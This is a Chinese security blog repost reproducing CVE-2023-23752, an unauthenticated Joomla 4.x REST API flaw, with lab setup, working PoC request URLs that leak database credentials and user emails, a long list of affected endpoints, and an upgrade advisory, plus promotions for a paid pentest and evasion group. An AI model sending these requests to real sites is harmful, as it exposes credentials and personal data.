【漏洞速递 | 附EXP】 CVE-2023-23752复现
2023-2-22 21:18:58 Author: 渗透安全团队(查看原文) 阅读量:34 收藏

0x01 前言

 Joomla是一套全球知名的内容管理系统(CMS),其使用PHP语言加上MySQL数据库所开发,可以在Linux、Windows、MacOSX等各种不同的平台上运行。

2月16日,Joomla官方发布安全公告,修复了Joomla! CMS中的一个未授权访问漏洞(CVE-2023-23752),目前该漏洞的细节及PoC/EXP已公开。
Joomla! CMS 版本4.0.0 - 4.2.7中由于对web 服务端点访问限制不当,可能导致未授权访问Rest API,造成敏感信息泄露(如数据库账号密码等)。鉴于该漏洞影响较大,建议客户尽快做好自查及防护。

0x02 影响版本

受影响版本    4.0.0 <= Joomla <= 4.2.7不受影响版本Joomla >= 4.2.8    Joomla 3及以下版本均不受该漏洞影响

0x03 环境搭建

直接phpstudy或者wamp搭建

下载解压后放入

wamp/www/Joomla或者phpstudy/PHPTutorial/WWW/Joomla/目录下。

访问http://127.0.0.1/Joomla/准备安装

登录数据配置

数据库配置信息

安装完成

环境搭建成功

0x04 漏洞复现

PoC:

http://127.0.0.1/Joomla4.2.7/api/index.php/v1/config/application?public=true

这个API用于获取网站最重要的配置信息,包含数据库的账号与密码。

获取网站用户名以及邮箱账号

http://127.0.0.1/Joomla4.2.7/api/index.php/v1/users?public=true


其他受影响API如下:

v1/bannersv1/banners/:idv1/bannersv1/banners/:idv1/banners/:idv1/banners/clientsv1/banners/clients/:idv1/banners/clientsv1/banners/clients/:idv1/banners/clients/:idv1/banners/categoriesv1/banners/categories/:idv1/banners/categoriesv1/banners/categories/:idv1/banners/categories/:idv1/banners/:id/contenthistoryv1/banners/:id/contenthistory/keepv1/banners/:id/contenthistoryv1/config/applicationv1/config/applicationv1/config/:component_namev1/config/:component_namev1/contacts/form/:idv1/contactsv1/contacts/:idv1/contactsv1/contacts/:idv1/contacts/:idv1/contacts/categoriesv1/contacts/categories/:idv1/contacts/categoriesv1/contacts/categories/:idv1/contacts/categories/:idv1/fields/contacts/contactv1/fields/contacts/contact/:idv1/fields/contacts/contactv1/fields/contacts/contact/:idv1/fields/contacts/contact/:idv1/fields/contacts/mailv1/fields/contacts/mail/:idv1/fields/contacts/mailv1/fields/contacts/mail/:idv1/fields/contacts/mail/:idv1/fields/contacts/categoriesv1/fields/contacts/categories/:idv1/fields/contacts/categoriesv1/fields/contacts/categories/:idv1/fields/contacts/categories/:idv1/fields/groups/contacts/contactv1/fields/groups/contacts/contact/:idv1/fields/groups/contacts/contactv1/fields/groups/contacts/contact/:idv1/fields/groups/contacts/contact/:idv1/fields/groups/contacts/mailv1/fields/groups/contacts/mail/:idv1/fields/groups/contacts/mailv1/fields/groups/contacts/mail/:idv1/fields/groups/contacts/mail/:idv1/fields/groups/contacts/categoriesv1/fields/groups/contacts/categories/:idv1/fields/groups/contacts/categoriesv1/fields/groups/contacts/categories/:idv1/fields/groups/contacts/categories/:idv1/contacts/:id/contenthistoryv1/contacts/:id/contenthistory/keepv1/contacts/:id/contenthistoryv1/content/articlesv1/content/articles/:idv1/content/articlesv1/content/articles/:idv1/content/articles/:idv1/content/categoriesv1/content/categories/:idv1/content/categoriesv1/content/categories/:idv1/content/categories/:idv1/fields/content/articlesv1/fields/content/articles/:idv1/fields/content/articlesv1/fields/content/articles/:idv1/fields/content/articles/:idv1/fields/content/categoriesv1/fields/content/categories/:idv1/fields/content/categoriesv1/fields/content/categories/:idv1/fields/content/categories/:idv1/fields/groups/content/articlesv1/fields/groups/content/articles/:idv1/fields/groups/content/articlesv1/fields/groups/content/articles/:idv1/fields/groups/content/articles/:idv1/fields/groups/content/categoriesv1/fields/groups/content/categories/:idv1/fields/groups/content/categoriesv1/fields/groups/content/categories/:idv1/fields/groups/content/categories/:idv1/content/articles/:id/contenthistoryv1/content/articles/:id/contenthistory/keepv1/content/articles/:id/contenthistoryv1/extensionsv1/languages/contentv1/languages/content/:idv1/languages/contentv1/languages/content/:idv1/languages/content/:idv1/languages/overrides/searchv1/languages/overrides/search/cache/refreshv1/languages/overrides/site/zh-CNv1/languages/overrides/site/zh-CN/:idv1/languages/overrides/site/zh-CNv1/languages/overrides/site/zh-CN/:idv1/languages/overrides/site/zh-CN/:idv1/languages/overrides/administrator/zh-CNv1/languages/overrides/administrator/zh-CN/:idv1/languages/overrides/administrator/zh-CNv1/languages/overrides/administrator/zh-CN/:idv1/languages/overrides/administrator/zh-CN/:idv1/languages/overrides/site/en-GBv1/languages/overrides/site/en-GB/:idv1/languages/overrides/site/en-GBv1/languages/overrides/site/en-GB/:idv1/languages/overrides/site/en-GB/:idv1/languages/overrides/administrator/en-GBv1/languages/overrides/administrator/en-GB/:idv1/languages/overrides/administrator/en-GBv1/languages/overrides/administrator/en-GB/:idv1/languages/overrides/administrator/en-GB/:idv1/languagesv1/languagesv1/media/adaptersv1/media/adapters/:idv1/media/filesv1/media/files/:path/v1/media/files/:pathv1/media/filesv1/media/files/:pathv1/media/files/:pathv1/menus/sitev1/menus/site/:idv1/menus/sitev1/menus/site/:idv1/menus/site/:idv1/menus/administratorv1/menus/administrator/:idv1/menus/administratorv1/menus/administrator/:idv1/menus/administrator/:idv1/menus/site/itemsv1/menus/site/items/:idv1/menus/site/itemsv1/menus/site/items/:idv1/menus/site/items/:idv1/menus/administrator/itemsv1/menus/administrator/items/:idv1/menus/administrator/itemsv1/menus/administrator/items/:idv1/menus/administrator/items/:idv1/menus/site/items/typesv1/menus/administrator/items/typesv1/messagesv1/messages/:idv1/messagesv1/messages/:idv1/messages/:idv1/modules/types/sitev1/modules/types/administratorv1/modules/sitev1/modules/site/:idv1/modules/sitev1/modules/site/:idv1/modules/site/:idv1/modules/administratorv1/modules/administrator/:idv1/modules/administratorv1/modules/administrator/:idv1/modules/administrator/:idv1/newsfeeds/feedsv1/newsfeeds/feeds/:idv1/newsfeeds/feedsv1/newsfeeds/feeds/:idv1/newsfeeds/feeds/:idv1/newsfeeds/categoriesv1/newsfeeds/categories/:idv1/newsfeeds/categoriesv1/newsfeeds/categories/:idv1/newsfeeds/categories/:idv1/pluginsv1/plugins/:idv1/plugins/:idv1/privacy/requestsv1/privacy/requests/:idv1/privacy/requests/export/:idv1/privacy/requestsv1/privacy/consentsv1/privacy/consents/:idv1/privacy/consents/:idv1/redirectsv1/redirects/:idv1/redirectsv1/redirects/:idv1/redirects/:idv1/tagsv1/tags/:idv1/tagsv1/tags/:idv1/tags/:idv1/templates/styles/sitev1/templates/styles/site/:idv1/templates/styles/sitev1/templates/styles/site/:idv1/templates/styles/site/:idv1/templates/styles/administratorv1/templates/styles/administrator/:idv1/templates/styles/administratorv1/templates/styles/administrator/:idv1/templates/styles/administrator/:idv1/usersv1/users/:idv1/usersv1/users/:idv1/users/:idv1/fields/usersv1/fields/users/:idv1/fields/usersv1/fields/users/:idv1/fields/users/:idv1/fields/groups/usersv1/fields/groups/users/:idv1/fields/groups/usersv1/fields/groups/users/:idv1/fields/groups/users/:idv1/users/groupsv1/users/groups/:idv1/users/groupsv1/users/groups/:idv1/users/groups/:idv1/users/levelsv1/users/levels/:idv1/users/levelsv1/users/levels/:idv1/users/levels/:id

0x05 修复建议

目前官方已发布安全版本修复此漏洞,建议受影响的用户及时升级防护:https://downloads.joomla.org/

0x06 参考

https://xz.aliyun.com/t/12175


付费圈子

欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

关 注 有 礼

关注下方公众号回复“666”可以领取一套精品渗透测试工具集和百度云视频链接。

 还在等什么?赶紧点击下方名片关注学习吧!


群聊 | 技术交流群-群除我佬

干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247498450&idx=2&sn=efe74dbe584ee2bec97c344fd9d6dbcc&chksm=c176077df6018e6b348ef603891f3e36099978f3154666aeebc3bb5c6731b3dfc5476e0524f6#rd
如有侵权请联系:admin#unsafe.sh